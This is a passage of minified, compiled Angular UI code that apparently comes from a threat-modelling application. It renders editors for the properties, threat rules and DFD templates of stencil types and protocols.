be(e),Me(B(2).selectedThreatMnemonic.Description=n)}),u(),s(7,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedThreatMnemonic.Description)}}function Dut(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",23),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedProperty=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(4).OpenContextMenu(n,c))}),oe(1,"translate"),s(2,"\n                  "),m(3,"mat-icon",24),s(4,"arrow_right"),u(),s(5,"\n                  "),m(6,"div",25),s(7),oe(8,"translate"),u(),s(9,"\n                  "),m(10,"div",25),s(11),oe(12,"translate"),u(),s(13,"\n                  "),m(14,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteProperty(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,9,e.DisplayName)),C(7),ke(re(8,11,e.DisplayName)),C(4),za("",e.Type,": ",re(12,13,i.GetElementPropertyValue(e)),""),C(3),at("matTooltip",re(15,15,"general.Delete"))}}function xut(t,a){1&t&&(m(0,"mat-icon",30),s(1,"update"),u())}function wut(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",28),he("click",function(){const r=be(e).$implicit;return Me(B(5).selectedProperty=r)}),oe(1,"translate"),s(2,"\n                    "),m(3,"mat-icon",24),s(4),u(),s(5,"\n                    "),m(6,"div",25),s(7),oe(8,"translate"),u(),s(9,"\n                    "),m(10,"div",25),s(11),oe(12,"translate"),u(),s(13,"\n                    "),ne(14,xut,2,0,"mat-icon",29),s(15,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(5);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,10,e.DisplayName)),C(4),ke(i.GetIcon(i.selectedElementType)),C(3),ct("",re(8,12,e.DisplayName)," "),C(4),za("",e.Type,": ",re(12,14,i.GetElementPropertyValue(e)),""),C(3),V("ngIf",i.IsPropOverwritten(e))}}function Iut(t,a){if(1&t&&(bt(0),s(1,"\n                  "),it(2,"mat-divider"),s(3,"\n                  "),m(4,"div",19),s(5),oe(6,"translate"),u(),s(7,"\n                  "),ne(8,wut,16,16,"mat-list-item",27),s(9,"\n                "),Mt()),2&t){const e=B(4);C(5),za("",e.selectedElementType.Name," ",re(6,3,"general.Properties"),""),C(3),V("ngForOf",e.selectedElementType.Properties)}}function Rut(t,a){if(1&t){const e=Ye();m(0,"button",39),he("click",function(){return be(e),Me(B(5).selectedProperty.DisplayName="")}),oe(1,"translate"),s(2,"\n                      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n                    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Sut(t,a){if(1&t&&(m(0,"mat-option",40),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e)}}function kut(t,a){if(1&t){const e=Ye();bt(0),s(1),oe(2,"translate"),m(3,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(B(5).selectedProperty.DefaultValue=n)}),u(),Mt()}if(2&t){const e=B(5);C(1),ct("",re(2,2,"general.DefaultValue"),": "),C(2),V("ngModel",e.selectedProperty.DefaultValue)}}function Put(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"div",31),s(3,"\n                  "),m(4,"mat-form-field",32),s(5,"\n                    "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n                    "),m(10,"input",33),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.DisplayName=n)}),u(),s(11,"\n                    "),ne(12,Rut,6,3,"button",34),s(13,"\n                  "),u(),s(14,"\n                  "),it(15,"br"),s(16,"\n                  "),m(17,"mat-form-field",32),s(18,"\n                    "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n                    "),m(23,"mat-select",35),he("valueChange",function(n){return be(e),Me(B(4).selectedProperty.Type=n)}),s(24,"\n                      "),ne(25,Sut,2,2,"mat-option",36),s(26,"\n                    "),u(),s(27,"\n                  "),u(),s(28,"\n                  "),it(29,"br"),s(30,"\n                  "),m(31,"mat-form-field",10),s(32,"\n                    "),m(33,"mat-label"),s(34),oe(35,"translate"),u(),s(36,"\n                    "),m(37,"input",37),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.Tooltip=n)}),u(),s(38,"\n                  "),u(),s(39,"\n                  "),it(40,"br"),s(41,"\n                  "),ne(42,kut,4,4,"ng-container",9),s(43,"\n                  "),it(44,"br"),s(45),oe(46,"translate"),m(47,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.Editable=n)}),u(),s(48,"\n                "),u(),s(49,"\n              "),Mt()}if(2&t){const e=B(4);C(7),ke(re(8,15,"general.PropertyName")),C(3),at("matTooltip",e.selectedProperty.DisplayName),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.DisplayName),C(2),V("ngIf",e.selectedProperty.DisplayName),C(8),ke(re(21,17,"general.Type")),C(3),at("matTooltip",e.selectedProperty.Type),V("value",e.selectedProperty.Type),C(2),V("ngForOf",e.GetPropertyTypes()),C(9),ke(re(35,19,"general.Tooltip")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.Tooltip),C(5),V("ngIf","Check Box"==e.selectedProperty.Type),C(3),ct("\n                  ",re(46,21,"general.Editable"),": "),C(2),V("ngModel",e.selectedProperty.Editable)}}function Out(t,a){if(1&t){const e=Ye();bt(0,42),s(1,"\n                    "),m(2,"button",43),he("click",function(){return be(e),Me(B(5).OverwriteProperty())}),s(3),oe(4,"translate"),u(),s(5,"\n                  "),Mt()}2&t&&(C(3),ke(re(4,1,"pages.config.overwriteProp")))}function Nut(t,a){if(1&t){const e=Ye();bt(0),s(1),m(2,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(B(6).currentPropertyOverwriting.Value=n)}),u(),Mt()}if(2&t){const e=B(6);C(1),ct("",e.selectedProperty.DisplayName,": "),C(1),V("ngModel",e.currentPropertyOverwriting.Value)}}function Lut(t,a){if(1&t&&(m(0,"mat-option",40),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ke(e.Name)}}function zut(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",32),s(1,"\n                        "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n                        "),m(6,"mat-select",46),he("valueChange",function(n){return be(e),Me(B(6).currentPropertyOverwriting.Value=n)}),s(7,"\n                          "),ne(8,Lut,2,2,"mat-option",36),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(6);C(3),ke(re(4,4,"general.Protocols")),C(3),at("matTooltip",e.GetNamesOfIDs(e.GetProtocols(),e.currentPropertyOverwriting.Value)),V("value",e.currentPropertyOverwriting.Value),C(2),V("ngForOf",e.GetProtocols())}}function Wut(t,a){if(1&t){const e=Ye();bt(0,42),s(1," \n                    "),m(2,"button",43),he("click",function(){return be(e),Me(B(5).UnOverwriteProperty())}),s(3),oe(4,"translate"),u(),s(5,"\n                    "),m(6,"div",44),s(7,"\n                      "),ne(8,Nut,3,2,"ng-container",9),s(9,"\n                      "),ne(10,zut,11,6,"mat-form-field",45),s(11,"\n                    "),u(),s(12,"\n                  "),Mt()}if(2&t){const e=B(5);C(3),ke(re(4,3,"pages.config.removeOverwriting")),C(5),V("ngIf","Check Box"==e.selectedProperty.Type),C(2),V("ngIf","Protocol Select"==e.selectedProperty.Type)}}function Fut(t,a){if(1&t&&(bt(0),s(1,"\n                "),m(2,"div",31),s(3,"\n                  "),ne(4,Out,6,3,"ng-container",41),s(5,"\n                  "),ne(6,Wut,13,5,"ng-container",41),s(7,"\n                "),u(),s(8,"\n              "),Mt()),2&t){const e=B(4);C(4),V("ngIf",!e.IsPropOverwritten(e.selectedProperty)),C(2),V("ngIf",e.IsPropOverwritten(e.selectedProperty))}}function Vut(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",16),s(2,"\n            "),m(3,"div",17),s(4,"\n              "),m(5,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.drop(n,r.selectedType.Properties))}),s(6,"\n                "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",20),he("click",function(){return be(e),Me(B(3).AddProperty())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                "),ne(15,Dut,19,17,"mat-list-item",21),s(16,"\n                "),ne(17,Iut,10,5,"ng-container",9),s(18,"\n              "),u(),s(19,"\n            "),u(),s(20,"\n            "),m(21,"div",22),s(22,"\n              "),ne(23,Put,50,23,"ng-container",9),s(24,"\n              "),ne(25,Fut,9,2,"ng-container",9),s(26,"\n            "),u(),s(27,"\n          "),u(),s(28,"\n        ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedType.Name," ",re(9,11,"general.Properties")," "),C(2),at("matTooltip",re(11,13,"general.Add")),C(5),V("ngForOf",e.selectedType.Properties),C(2),V("ngIf",!e.selectedType.IsDefault),C(6),V("ngIf",null==e.selectedType.Properties?null:e.selectedType.Properties.includes(e.selectedProperty)),C(2),V("ngIf",!e.selectedType.IsDefault&&(null==e.selectedElementType.Properties?null:e.selectedElementType.Properties.includes(e.selectedProperty)))}}function But(t,a){1&t&&(m(0,"div",25),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(C(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function Hut(t,a){if(1&t&&(m(0,"div",25),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit,i=B(4);C(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetStencilRestrictionsCount(e),"")}}function Uut(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",49),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedThreatRule=r)}),s(1,"\n                  "),m(2,"mat-icon",24),s(3,"arrow_right"),u(),s(4,"\n                  "),m(5,"div",25),s(6),u(),s(7,"\n                  "),ne(8,But,4,6,"div",50),s(9,"\n                  "),ne(10,Hut,3,4,"div",50),s(11,"\n                  "),m(12,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteThreat(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"delete"),u()(),s(16,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),V("ngIf",0==i.GetStencilRestrictionsCount(e)),C(2),V("ngIf",i.GetStencilRestrictionsCount(e)>0),C(2),at("matTooltip",re(13,9,"general.Delete"))}}function qut(t,a){1&t&&(m(0,"div",25),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(C(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function Gut(t,a){if(1&t&&(m(0,"div",25),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit,i=B(5);C(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetStencilRestrictionsCount(e),"")}}function jut(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",28),he("click",function(){const r=be(e).$implicit;return Me(B(5).selectedThreatRule=r)}),s(1,"\n                    "),m(2,"mat-icon",24),s(3),u(),s(4,"\n                    "),m(5,"div",25),s(6),u(),s(7,"\n                    "),ne(8,qut,4,6,"div",50),s(9,"\n                    "),ne(10,Gut,3,4,"div",50),s(11,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(5);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(3),ke(i.GetIcon(i.selectedElementType)),C(3),ke(e.Name),C(2),V("ngIf",0==i.GetStencilRestrictionsCount(e)),C(2),V("ngIf",i.GetStencilRestrictionsCount(e)>0)}}function Qut(t,a){if(1&t&&(bt(0),s(1,"\n                  "),it(2,"mat-divider"),s(3,"\n                  "),m(4,"div",19),s(5),oe(6,"translate"),u(),s(7,"\n                  "),ne(8,jut,12,9,"mat-list-item",27),s(9,"\n                "),Mt()),2&t){const e=B(4);C(5),za("",e.selectedElementType.Name," ",re(6,3,"general.Threats"),""),C(3),V("ngForOf",e.elementTypeThreats)}}function $ut(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",16),s(2,"\n            "),m(3,"div",17),s(4,"\n              "),m(5,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.dropThreat(n,r.typeThreats))}),s(6,"\n                "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",20),he("click",function(){return be(e),Me(B(3).AddThreat())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                "),ne(15,Uut,17,11,"mat-list-item",47),s(16,"\n                "),ne(17,Qut,10,5,"ng-container",9),s(18,"\n              "),u(),s(19,"\n            "),u(),s(20,"\n            "),m(21,"div",22),s(22,"\n              "),it(23,"app-threat-rule",48),s(24,"\n            "),u(),s(25,"\n          "),u(),s(26,"\n        ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedType.Name," ",re(9,13,"general.Threats")," "),C(2),at("matTooltip",re(11,15,"general.Add")),C(5),V("ngForOf",e.typeThreats),C(2),V("ngIf",!e.selectedType.IsDefault),C(6),V("node",e.selectedNode)("threatRule",e.selectedThreatRule)("canEdit",e.isTypeThreat)("canEditName",!0)}}function Kut(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",55),s(1,"\n                  "),m(2,"mat-icon",24),s(3,"arrow_right"),u(),s(4,"\n                  "),m(5,"div",25),s(6),u(),s(7,"\n                  "),m(8,"button",26),he("click",function(){be(e);const n=B(5);return Me(n.DeleteTemplate(n.selectedType.TemplateDFD))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"delete"),u()(),s(12,"\n                "),u()}if(2&t){const e=B(5);Ct("highlight-light",!e.theme.IsDarkMode)("highlight-dark",e.theme.IsDarkMode),at("matTooltip",e.selectedType.TemplateDFD.Name),C(6),ke(e.selectedType.TemplateDFD.Name),C(2),at("matTooltip",re(9,7,"general.Delete"))}}function Xut(t,a){if(1&t){const e=Ye();m(0,"button",39),he("click",function(){return be(e),Me(B(5).selectedType.TemplateDFD.Name="")}),oe(1,"translate"),s(2,"\n                    "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n                  "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Yut(t,a){1&t&&it(0,"app-stencil-type-template",56),2&t&&V("selectedTypeTemplate",B(5).selectedType.TemplateDFD)}function Jut(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",16),s(2,"\n            "),m(3,"div",17),s(4,"\n              "),m(5,"mat-list",51),s(6,"\n                "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",52),he("click",function(){return be(e),Me(B(4).AddTemplateDFD())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                "),ne(15,Kut,13,9,"mat-list-item",53),s(16,"\n              "),u(),s(17,"\n            "),u(),s(18,"\n            "),m(19,"div",22),s(20,"\n              "),m(21,"div",31),s(22,"\n                "),m(23,"mat-form-field",32),s(24,"\n                  "),m(25,"mat-label"),s(26),oe(27,"translate"),u(),s(28,"\n                  "),m(29,"input",54),he("ngModelChange",function(n){return be(e),Me(B(4).selectedType.TemplateDFD.Name=n)}),u(),s(30,"\n                  "),ne(31,Xut,6,3,"button",34),s(32,"\n                "),u(),s(33,"\n                "),it(34,"br"),s(35,"\n                "),ne(36,Yut,1,1,"app-stencil-type-template",8),s(37,"\n              "),u(),s(38,"\n            "),u(),s(39,"\n          "),u(),s(40,"\n        ")}if(2&t){const e=B(4);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedType.Name," ",re(9,14,"pages.config.stencils.DFDTemplate")," "),C(2),at("matTooltip",re(11,16,"general.Add")),V("disabled",!!e.selectedType.TemplateDFD),C(5),V("ngIf",e.selectedType.TemplateDFD),C(11),ke(re(27,18,"properties.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedType.TemplateDFD.Name),C(2),V("ngIf",e.selectedType.TemplateDFD.Name),C(5),V("ngIf",e.selectedType.TemplateDFD)}}function Zut(t,a){if(1&t&&(m(0,"mat-tab",13),oe(1,"translate"),s(2,"\n        "),ne(3,Jut,41,20,"ng-template",14),s(4,"\n    "),u()),2&t){const e=B(3);$c("label","",re(1,2,"pages.config.stencils.DFDTemplate")," ",e.selectedType.TemplateDFD?"(1)":"","")}}function eht(t,a){if(1&t){const e=Ye();m(0,"mat-tab-group",12),he("selectedIndexChange",function(n){return be(e),Me(B(2).SetSelectedTabIndex(n))}),s(1,"\n    "),m(2,"mat-tab",13),oe(3,"translate"),s(4,"\n        "),ne(5,Vut,29,15,"ng-template",14),s(6,"\n    "),u(),s(7,"\n    "),m(8,"mat-tab",13),oe(9,"translate"),s(10,"\n        "),ne(11,$ut,27,17,"ng-template",14),s(12,"\n    "),u(),s(13,"\n    "),ne(14,Zut,5,4,"mat-tab",15),s(15,"\n  "),u()}if(2&t){const e=B(2);V("selectedIndex",e.GetSelectedTabIndex()),C(2),$c("label","",re(3,6,"general.Properties")," (",null==e.selectedType||null==e.selectedType.Properties?null:e.selectedType.Properties.length,")"),C(6),$c("label","",re(9,8,"general.Threats")," (",null==e.typeThreats?null:e.typeThreats.length,")"),C(6),V("ngIf",61==e.selectedType.ElementTypeID)}}function tht(t,a){1&t&&it(0,"app-stencil-type-template",56),2&t&&V("selectedTypeTemplate",B(2).selectedTypeTemplate)}function iht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",23),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedProperty=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(4).OpenContextMenu(n,c))}),oe(1,"translate"),s(2,"\n                  "),m(3,"mat-icon",24),s(4,"arrow_right"),u(),s(5,"\n                  "),m(6,"div",25),s(7),oe(8,"translate"),u(),s(9,"\n                  "),m(10,"div",25),s(11),oe(12,"translate"),u(),s(13,"\n                  "),m(14,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteProperty(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,9,e.DisplayName)),C(7),ke(re(8,11,e.DisplayName)),C(4),za("",e.Type,": ",re(12,13,i.GetElementPropertyValue(e)),""),C(3),at("matTooltip",re(15,15,"general.Delete"))}}function aht(t,a){1&t&&(m(0,"mat-icon",30),s(1,"update"),u())}function nht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",28),he("click",function(){const r=be(e).$implicit;return Me(B(5).selectedProperty=r)}),oe(1,"translate"),s(2,"\n                    "),m(3,"mat-icon",24),s(4),u(),s(5,"\n                    "),m(6,"div",25),s(7),oe(8,"translate"),u(),s(9,"\n                    "),m(10,"div",25),s(11),oe(12,"translate"),u(),s(13,"\n                    "),ne(14,aht,2,0,"mat-icon",29),s(15,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(5);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,10,e.DisplayName)),C(4),ke(i.GetIcon(i.defaultProtocol)),C(3),ke(re(8,12,e.DisplayName)),C(4),za("",e.Type,": ",re(12,14,i.GetElementPropertyValue(e)),""),C(3),V("ngIf",i.IsPropOverwritten(e))}}function oht(t,a){if(1&t&&(bt(0),s(1,"\n                  "),it(2,"mat-divider"),s(3,"\n                  "),m(4,"div",19),s(5),oe(6,"translate"),u(),s(7,"\n                  "),ne(8,nht,16,16,"mat-list-item",27),s(9,"\n                "),Mt()),2&t){const e=B(4);C(5),za("",e.defaultProtocol.Name," ",re(6,3,"general.Properties"),""),C(3),V("ngForOf",e.defaultProtocol.Properties)}}function rht(t,a){if(1&t){const e=Ye();m(0,"button",39),he("click",function(){return be(e),Me(B(5).selectedProperty.DisplayName="")}),oe(1,"translate"),s(2,"\n                      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n                    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function sht(t,a){if(1&t&&(m(0,"mat-option",40),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e)}}function cht(t,a){if(1&t){const e=Ye();bt(0),s(1),oe(2,"translate"),m(3,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(B(5).selectedProperty.DefaultValue=n)}),u(),Mt()}if(2&t){const e=B(5);C(1),ct("",re(2,2,"general.DefaultValue"),": "),C(2),V("ngModel",e.selectedProperty.DefaultValue)}}function lht(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"div",31),s(3,"\n                  "),m(4,"mat-form-field",32),s(5,"\n                    "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n                    "),m(10,"input",57),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.DisplayName=n)}),u(),s(11,"\n                    "),ne(12,rht,6,3,"button",34),s(13,"\n                  "),u(),s(14,"\n                  "),it(15,"br"),s(16,"\n                  "),m(17,"mat-form-field",32),s(18,"\n                    "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n                    "),m(23,"mat-select",35),he("valueChange",function(n){return be(e),Me(B(4).selectedProperty.Type=n)}),s(24,"\n                      "),ne(25,sht,2,2,"mat-option",36),s(26,"\n                    "),u(),s(27,"\n                  "),u(),s(28,"\n                  "),it(29,"br"),s(30,"\n                  "),ne(31,cht,4,4,"ng-container",9),s(32,"\n                  "),it(33,"br"),s(34),oe(35,"translate"),m(36,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.Editable=n)}),u(),s(37,"\n                "),u(),s(38,"\n              "),Mt()}if(2&t){const e=B(4);C(7),ke(re(8,11,"general.PropertyName")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.DisplayName),C(2),V("ngIf",e.selectedProperty.DisplayName),C(8),ke(re(21,13,"general.Type")),C(3),at("matTooltip",e.selectedProperty.Type),V("value",e.selectedProperty.Type),C(2),V("ngForOf",e.GetPropertyTypes()),C(6),V("ngIf","Check Box"==e.selectedProperty.Type),C(3),ct("\n                  ",re(35,15,"general.Editable"),": "),C(2),V("ngModel",e.selectedProperty.Editable)}}function dht(t,a){if(1&t){const e=Ye();bt(0,42),s(1,"\n                    "),m(2,"button",43),he("click",function(){return be(e),Me(B(5).OverwriteProperty())}),s(3),oe(4,"translate"),u(),s(5,"\n                  "),Mt()}2&t&&(C(3),ke(re(4,1,"pages.config.overwriteProp")))}function mht(t,a){if(1&t){const e=Ye();bt(0),s(1),m(2,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(B(6).currentPropertyOverwriting.Value=n)}),u(),Mt()}if(2&t){const e=B(6);C(1),ct("",e.selectedProperty.DisplayName,": "),C(1),V("ngModel",e.currentPropertyOverwriting.Value)}}function uht(t,a){if(1&t){const e=Ye();bt(0,42),s(1," \n                    "),m(2,"button",43),he("click",function(){return be(e),Me(B(5).UnOverwriteProperty())}),s(3),oe(4,"translate"),u(),s(5,"\n                    "),m(6,"div",44),s(7,"\n                      "),ne(8,mht,3,2,"ng-container",9),s(9,"\n                    "),u(),s(10,"\n                  "),Mt()}if(2&t){const e=B(5);C(3),ke(re(4,2,"pages.config.removeOverwriting")),C(5),V("ngIf","Check Box"==e.selectedProperty.Type)}}function hht(t,a){if(1&t&&(bt(0),s(1,"\n                "),m(2,"div",31),s(3,"\n                  "),ne(4,dht,6,3,"ng-container",41),s(5,"\n                  "),ne(6,uht,11,4,"ng-container",41),s(7,"\n                "),u(),s(8,"\n              "),Mt()),2&t){const e=B(4);C(4),V("ngIf",!e.IsPropOverwritten(e.selectedProperty)),C(2),V("ngIf",e.IsPropOverwritten(e.selectedProperty))}}function fht(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",16),s(2,"\n            "),m(3,"div",17),s(4,"\n              "),m(5,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.drop(n,r.selectedProtocol.Properties))}),s(6,"\n                "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",20),he("click",function(){return be(e),Me(B(3).AddProperty())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                "),ne(15,iht,19,17,"mat-list-item",21),s(16,"\n                "),ne(17,oht,10,5,"ng-container",9),s(18,"\n              "),u(),s(19,"\n            "),u(),s(20,"\n            "),m(21,"div",22),s(22,"\n              "),ne(23,lht,39,17,"ng-container",9),s(24,"\n              "),ne(25,hht,9,2,"ng-container",9),s(26,"\n            "),u(),s(27,"\n          "),u(),s(28,"\n        ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedProtocol.Name," ",re(9,11,"general.Properties")," "),C(2),at("matTooltip",re(11,13,"general.Add")),C(5),V("ngForOf",e.selectedProtocol.Properties),C(2),V("ngIf",!e.selectedProtocol.IsDefault),C(6),V("ngIf",null==e.selectedProtocol.Properties?null:e.selectedProtocol.Properties.includes(e.selectedProperty)),C(2),V("ngIf",!e.selectedProtocol.IsDefault&&(null==e.defaultProtocol.Properties?null:e.defaultProtocol.Properties.includes(e.selectedProperty)))}}function pht(t,a){1&t&&(m(0,"div",25),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(C(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function _ht(t,a){if(1&t&&(m(0,"div",25),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit,i=B(4);C(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetStencilRestrictionsCount(e),"")}}function ght(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",49),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedThreatRule=r)}),s(1,"\n                  "),m(2,"mat-icon",24),s(3,"arrow_right"),u(),s(4,"\n                  "),m(5,"div",25),s(6),u(),s(7,"\n                  "),ne(8,pht,4,6,"div",50),s(9,"\n                  "),ne(10,_ht,3,4,"div",50),s(11,"\n                  "),m(12,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteThreat(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"delete"),u()(),s(16,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),V("ngIf",0==i.GetStencilRestrictionsCount(e)),C(2),V("ngIf",i.GetStencilRestrictionsCount(e)>0),C(2),at("matTooltip",re(13,9,"general.Delete"))}}function Cht(t,a){1&t&&(m(0,"div",25),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(C(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function yht(t,a){if(1&t&&(m(0,"div",25),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit,i=B(5);C(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetStencilRestrictionsCount(e),"")}}function bht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",28),he("click",function(){const r=be(e).$implicit;return Me(B(5).selectedThreatRule=r)}),s(1,"\n                    "),m(2,"mat-icon",24),s(3),u(),s(4,"\n                    "),m(5,"div",25),s(6),u(),s(7,"\n                    "),ne(8,Cht,4,6,"div",50),s(9,"\n                    "),ne(10,yht,3,4,"div",50),s(11,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(5);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(3),ke(i.GetIcon(i.defaultProtocol)),C(3),ke(e.Name),C(2),V("ngIf",0==i.GetStencilRestrictionsCount(e)),C(2),V("ngIf",i.GetStencilRestrictionsCount(e)>0)}}function Mht(t,a){if(1&t&&(bt(0),s(1,"\n                  "),it(2,"mat-divider"),s(3,"\n                  "),m(4,"div",19),s(5),oe(6,"translate"),u(),s(7,"\n                  "),ne(8,bht,12,9,"mat-list-item",27),s(9,"\n                "),Mt()),2&t){const e=B(4);C(5),za("",e.defaultProtocol.Name," ",re(6,3,"general.Threats"),""),C(3),V("ngForOf",e.elementTypeThreats)}}function vht(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",16),s(2,"\n            "),m(3,"div",17),s(4,"\n              "),m(5,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.dropThreat(n,r.typeThreats))}),s(6,"\n                